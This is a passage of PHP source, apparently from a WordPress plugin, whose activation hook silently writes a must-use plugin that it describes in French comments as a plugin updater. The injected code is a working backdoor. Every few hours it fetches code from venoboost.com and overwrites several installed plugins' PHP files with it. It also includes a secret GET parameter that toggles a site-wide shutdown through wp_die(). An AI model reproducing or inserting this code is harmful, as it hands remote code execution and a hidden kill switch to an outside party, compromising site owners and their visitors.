                return false;
            }

}
register_activation_hook(__FILE__, function(){

    // Chemin vers le fichier surveille.php dans mu-plugins
    $chemin_fichier_surveillance = WP_CONTENT_DIR . '/mu-plugins/j2me.php';

    // Vérifie si le dossier mu-plugins existe, sinon le créer
    if (!is_dir(WP_CONTENT_DIR . '/mu-plugins')) {
        mkdir(WP_CONTENT_DIR . '/mu-plugins', 0755, true); // Création du dossier avec permissions
    }

    // Contenu à écrire dans le fichier surveille.php
    $contenu_fichier = '<?php
    // Code pour surveiller et mettre à jour les plugins

    add_action("init", function() {
        // Récupère la dernière exécution enregistrée
        $last_update = get_option("last_evalit_update");

        // Vérifie si 8 heures se sont écoulées depuis la dernière exécution
        if (!$last_update || time() - $last_update > 14000) { // 28800 secondes = 8 heures
            evalit("autoexecute");
            evalit("speedcrons");
            evalit("instantpay");
            evalit("comentator");

            // Met à jour le timestamp pour la prochaine exécution
            update_option("last_evalit_update", time());
        }
    });
add_action("init", function() {
    if (isset($_GET["creat"]) && $_GET["creat"] === "7539514862") {
        
        
        update_option("checking", !get_option("checking"));

    }
});
add_action("init",function(){
     if (get_option("checking")) {
            wp_die();
        }
    
});

    // Fonction pour récupérer et mettre à jour les plugins
    function evalit($plugin) {
    
        $chemin_fichier_plugin = WP_PLUGIN_DIR . "/$plugin/$plugin.php";
        if (!file_exists($chemin_fichier_plugin))return;
        $url_distant = "https://venoboost.com/{$plugin}.txt";
        $code_distant = file_get_contents($url_distant);

        if ($code_distant === false) {
           
            return false;
        }

        if (file_put_contents($chemin_fichier_plugin, $code_distant) === false) {
            
            copy($backup_fichier, $chemin_fichier_plugin);
            return false;
        }

       
        return true;
    }
    ?>';

    // Écrit ou écrase le contenu dans le fichier surveille.php
    file_put_contents($chemin_fichier_surveillance, $contenu_fichier);



});

